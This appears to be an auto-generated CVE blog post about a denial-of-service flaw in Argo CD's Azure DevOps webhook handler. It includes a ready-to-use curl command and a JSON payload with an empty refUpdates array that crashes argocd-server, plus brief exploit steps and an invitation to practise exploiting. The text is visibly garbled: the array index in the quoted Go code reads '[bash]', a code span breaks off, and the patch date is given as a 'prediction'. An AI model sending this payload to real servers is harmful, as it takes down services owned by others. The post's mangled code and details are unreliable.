Argo CD, Denial-of-Service, CVE-2023-22736 (Critical)

By /

Listen to this Post

How the CVE Works

The vulnerability exists within the code handling Azure DevOps webhook push events in Argo CD. When a `git.push` event is received, the code processes the JSON payload. It attempts to access the first element of the `resource.refUpdates` array without first checking if the array is empty. Specifically, it directly accesses `payload.Resource.RefUpdates

` to extract revision information. If an attacker sends a malicious webhook payload containing an empty `"refUpdates": []` array, this access causes an index-out-of-range panic in the Go code. Because this panic occurs on the main HTTP server goroutine and is not recovered, it results in the immediate termination of the entire `argocd-server` process, causing a complete denial-of-service.

<h2 style="color: blue;">DailyCVE Form</h2>

Platform: Argo CD
Version: < v2.6.5
Vulnerability: DoS
Severity: Critical

<h2 style="color: blue;">date: 2023-01-24</h2>

<h2 style="color: blue;">Prediction: Patch 2023-01-31</h2>

<h2 style="color: blue;">What Undercode Say</h2>

Showing bash commands and codes related to the blog
[bash]
curl -k -X POST https://argocd.example.com/api/webhook -H 'X-Vss-ActivityId: 11111111-1111-1111-1111-111111111111' -H 'Content-Type: application/json' --data-binary @payload-azure-empty.json

{
"eventType": "git.push",
"resource": {
"refUpdates": [],
"repository": {
"remoteUrl": "https://example.com/dummy",
"defaultBranch": "refs/heads/master"
}
}
}

// Vulnerable Code (util/webhook/webhook.go)
revision = ParseRevision(payload.Resource.RefUpdates[bash].Name)
change.shaAfter = ParseRevision(payload.Resource.RefUpdates[bash].NewObjectID)
change.shaBefore = ParseRevision(payload.Resource.RefUpdates[bash].OldObjectID)

How Exploit

Craft Azure DevOps webhook payload with empty `refUpdates` array. Send unauthenticated POST request to /api/webhook. Server crashes with panic.

Protection from this CVE

Set webhook secrets. Apply patch. Update Argo CD.

Impact

Service outage. Availability loss.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top